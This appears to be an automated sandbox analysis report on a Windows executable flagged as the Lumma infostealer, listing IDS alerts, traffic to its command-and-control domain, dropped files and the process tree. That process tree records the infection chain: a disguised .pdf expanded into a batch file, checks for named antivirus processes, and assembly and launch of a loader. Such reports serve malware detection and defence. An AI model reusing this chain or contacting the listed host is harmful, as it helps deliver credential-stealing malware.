FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
USER32.dll	GetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
GDI32.dll	SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
SHELL32.dll	SHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
ADVAPI32.dll	RegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
COMCTL32.dll	ImageList_AddMasked, ImageList_Destroy, ImageList_Create
ole32.dll	CoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
VERSION.dll	GetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-03-07T16:28:29.760030+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49719	172.67.189.153	443	TCP
2025-03-07T16:28:30.262474+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49719	172.67.189.153	443	TCP
2025-03-07T16:28:30.262474+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49719	172.67.189.153	443	TCP
2025-03-07T16:28:31.730782+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49720	172.67.189.153	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 7, 2025 16:28:27.883137941 CET	49719	443	192.168.2.4	172.67.189.153
Mar 7, 2025 16:28:27.883193016 CET	443	49719	172.67.189.153	192.168.2.4
Mar 7, 2025 16:28:27.883316994 CET	49719	443	192.168.2.4	172.67.189.153
Mar 7, 2025 16:28:27.886320114 CET	49719	443	192.168.2.4	172.67.189.153
Mar 7, 2025 16:28:27.886332989 CET	443	49719	172.67.189.153	192.168.2.4
Mar 7, 2025 16:28:29.759871006 CET	443	49719	172.67.189.153	192.168.2.4
Mar 7, 2025 16:28:29.760030031 CET	49719	443	192.168.2.4	172.67.189.153
Mar 7, 2025 16:28:29.763607979 CET	49719	443	192.168.2.4	172.67.189.153
Mar 7, 2025 16:28:29.763617039 CET	443	49719	172.67.189.153	192.168.2.4
Mar 7, 2025 16:28:29.763901949 CET	443	49719	172.67.189.153	192.168.2.4
Mar 7, 2025 16:28:29.808645964 CET	49719	443	192.168.2.4	172.67.189.153
Mar 7, 2025 16:28:29.819741011 CET	49719	443	192.168.2.4	172.67.189.153
Mar 7, 2025 16:28:29.819770098 CET	49719	443	192.168.2.4	172.67.189.153
Mar 7, 2025 16:28:29.819845915 CET	443	49719	172.67.189.153	192.168.2.4
Mar 7, 2025 16:28:30.262456894 CET	443	49719	172.67.189.153	192.168.2.4
Mar 7, 2025 16:28:30.263197899 CET	443	49719	172.67.189.153	192.168.2.4
Mar 7, 2025 16:28:30.263246059 CET	443	49719	172.67.189.153	192.168.2.4
Mar 7, 2025 16:28:30.263273954 CET	49719	443	192.168.2.4	172.67.189.153
Mar 7, 2025 16:28:30.263276100 CET	443	49719	172.67.189.153	192.168.2.4
Mar 7, 2025 16:28:30.263288975 CET	443	49719	172.67.189.153	192.168.2.4
Mar 7, 2025 16:28:30.263325930 CET	49719	443	192.168.2.4	172.67.189.153
Mar 7, 2025 16:28:30.263338089 CET	443	49719	172.67.189.153	192.168.2.4
Mar 7, 2025 16:28:30.263376951 CET	49719	443	192.168.2.4	172.67.189.153
Mar 7, 2025 16:28:30.263385057 CET	443	49719	172.67.189.153	192.168.2.4
Mar 7, 2025 16:28:30.263398886 CET	443	49719	172.67.189.153	192.168.2.4
Mar 7, 2025 16:28:30.263439894 CET	49719	443	192.168.2.4	172.67.189.153
Mar 7, 2025 16:28:30.266269922 CET	49719	443	192.168.2.4	172.67.189.153
Mar 7, 2025 16:28:30.266284943 CET	443	49719	172.67.189.153	192.168.2.4
Mar 7, 2025 16:28:30.274893999 CET	49720	443	192.168.2.4	172.67.189.153
Mar 7, 2025 16:28:30.274926901 CET	443	49720	172.67.189.153	192.168.2.4
Mar 7, 2025 16:28:30.275008917 CET	49720	443	192.168.2.4	172.67.189.153
Mar 7, 2025 16:28:30.275382042 CET	49720	443	192.168.2.4	172.67.189.153
Mar 7, 2025 16:28:30.275401115 CET	443	49720	172.67.189.153	192.168.2.4
Mar 7, 2025 16:28:31.730782032 CET	49720	443	192.168.2.4	172.67.189.153

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 7, 2025 16:28:00.526726961 CET	58741	53	192.168.2.4	1.1.1.1
Mar 7, 2025 16:28:00.724164009 CET	53	58741	1.1.1.1	192.168.2.4
Mar 7, 2025 16:28:27.728008032 CET	57705	53	192.168.2.4	1.1.1.1
Mar 7, 2025 16:28:27.876403093 CET	53	57705	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Mar 7, 2025 16:28:00.526726961 CET	192.168.2.4	1.1.1.1	0x1e9b	Standard query (0)	RemCXcBAgdPicYq.RemCXcBAgdPicYq	A (IP address)	IN (0x0001)	false
Mar 7, 2025 16:28:27.728008032 CET	192.168.2.4	1.1.1.1	0xff3d	Standard query (0)	techworld2025.top	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Mar 7, 2025 16:28:00.724164009 CET	1.1.1.1	192.168.2.4	0x1e9b	Name error (3)	RemCXcBAgdPicYq.RemCXcBAgdPicYq	none	none	A (IP address)	IN (0x0001)	false
Mar 7, 2025 16:28:27.876403093 CET	1.1.1.1	192.168.2.4	0xff3d	No error (0)	techworld2025.top		172.67.189.153	A (IP address)	IN (0x0001)	false
Mar 7, 2025 16:28:27.876403093 CET	1.1.1.1	192.168.2.4	0xff3d	No error (0)	techworld2025.top		104.21.89.159	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

techworld2025.top

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49719	172.67.189.153	443	7720	C:\Users\user\AppData\Local\Temp\119035\Cuba.com

Timestamp	Bytes transferred	Direction	Data
2025-03-07 15:28:29 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: techworld2025.top
2025-03-07 15:28:29 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2025-03-07 15:28:30 UTC	564	IN	HTTP/1.1 403 Forbidden Date: Fri, 07 Mar 2025 15:28:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JaCD22OZy5PRqXX8TZ73IT0k1nGq5tNq4RbLyBkPZip1RhON0sb8nA%2BrIp4L2mckpy4Mi6RVEN8%2FTAlXkJf%2BUW5vDe53ZfVNWMKiHYe%2FFwh09IAQPk2L5aciWFYHDkCtDr%2FfTA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91cb1f7bfcfd0f93-EWR
2025-03-07 15:28:30 UTC	805	IN	Data Raw: 31 31 63 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 11c5<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2025-03-07 15:28:30 UTC	1369	IN	Data Raw: 6e 2d 63 67 69 2f 73 74 79 6c 65 73 2f 63 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d Data Ascii: n-cgi/styles/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElem
2025-03-07 15:28:30 UTC	1369	IN	Data Raw: 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 34 30 34 30 34 30 3b 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 62 6f 72 64 65 72 3a 20 30 3b 22 3e 4c 65 61 72 6e 20 4d 6f 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 66 6f 72 Data Ascii: <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <for
2025-03-07 15:28:30 UTC	1014	IN	Data Raw: 22 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 2d 62 74 6e 22 3e 43 6c 69 63 6b 20 74 6f 20 72 65 76 65 61 6c 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 3e 37 36 2e 39 39 2e 32 33 32 2e 31 30 35 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 Data Ascii: " class="cf-footer-ip-reveal-btn">Click to reveal</button> <span class="hidden" id="cf-footer-ip">76.99.232.105</span> <span class="cf-footer-separator sm:hidden">•</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><spa
2025-03-07 15:28:30 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	10:27:52
Start date:	07/03/2025
Path:	C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe"
Imagebase:	0x400000
File size:	1'483'827 bytes
MD5 hash:	5C4CA3E7135A0641AC01FBD73CD90CA8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	10:27:55
Start date:	07/03/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\cmd.exe" /c expand Increases.pdf Increases.pdf.bat & Increases.pdf.bat
Imagebase:	0xc70000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	10:27:55
Start date:	07/03/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff62fc20000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	10:27:56
Start date:	07/03/2025
Path:	C:\Windows\SysWOW64\expand.exe
Wow64 process (32bit):	true
Commandline:	expand Increases.pdf Increases.pdf.bat
Imagebase:	0x600000
File size:	53'248 bytes
MD5 hash:	544B0DBFF3F393BCE8BB9D815F532D51
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	10:27:56
Start date:	07/03/2025
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0x3a0000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	10:27:56
Start date:	07/03/2025
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /I "opssvc wrsa"
Imagebase:	0xd40000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	10:27:57
Start date:	07/03/2025
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0x3a0000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	10:27:57
Start date:	07/03/2025
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth"
Imagebase:	0xe60000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	10:27:58
Start date:	07/03/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c md 119035
Imagebase:	0xc70000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	10:27:58
Start date:	07/03/2025
Path:	C:\Windows\SysWOW64\extrac32.exe
Wow64 process (32bit):	true
Commandline:	extrac32 /Y /E Leads.pdf
Imagebase:	0xe40000
File size:	29'184 bytes
MD5 hash:	9472AAB6390E4F1431BAA912FCFF9707
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	10:27:58
Start date:	07/03/2025
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /V "Die" Protecting
Imagebase:	0xd40000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	10:27:58
Start date:	07/03/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c copy /b 119035\Cuba.com + Handhelds + Phases + Merger + Convenient + Pickup + Den + Agent + Intimate + Architect + Apparent + Relatively 119035\Cuba.com
Imagebase:	0xc70000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	10:27:59
Start date:	07/03/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c copy /b ..\Updates.pdf + ..\Florence.pdf + ..\Pastor.pdf + ..\Exceptions.pdf + ..\Anthropology.pdf + ..\Oriented.pdf + ..\Completion.pdf + ..\Launched.pdf R
Imagebase:	0xc70000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	10:27:59
Start date:	07/03/2025
Path:	C:\Users\user\AppData\Local\Temp\119035\Cuba.com
Wow64 process (32bit):	true
Commandline:	Cuba.com R
Imagebase:	0xfb0000
File size:	947'288 bytes
MD5 hash:	62D09F076E6E0240548C2F837536A46A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	10:27:59
Start date:	07/03/2025
Path:	C:\Windows\SysWOW64\choice.exe
Wow64 process (32bit):	true
Commandline:	choice /d y /t 5
Imagebase:	0xed0000
File size:	28'160 bytes
MD5 hash:	FCE0E41C87DC4ABBE976998AD26C27E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report #Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

PCAP (Network Traffic)

Sigma Signatures

HIPS / PFW / Operating System Protection Evasion

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\119035\Cuba.com

C:\Users\user\AppData\Local\Temp\119035\R

C:\Users\user\AppData\Local\Temp\Agent

C:\Users\user\AppData\Local\Temp\Anthropology.pdf

C:\Users\user\AppData\Local\Temp\Apparent

C:\Users\user\AppData\Local\Temp\Architect

C:\Users\user\AppData\Local\Temp\Completion.pdf

C:\Users\user\AppData\Local\Temp\Convenient

C:\Users\user\AppData\Local\Temp\Den

C:\Users\user\AppData\Local\Temp\Exceptions.pdf

C:\Users\user\AppData\Local\Temp\Florence.pdf

C:\Users\user\AppData\Local\Temp\Handhelds

C:\Users\user\AppData\Local\Temp\Increases.pdf

C:\Users\user\AppData\Local\Temp\Intimate

C:\Users\user\AppData\Local\Temp\Launched.pdf

C:\Users\user\AppData\Local\Temp\Leads.pdf

C:\Users\user\AppData\Local\Temp\Merger

Windows Analysis Report
#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe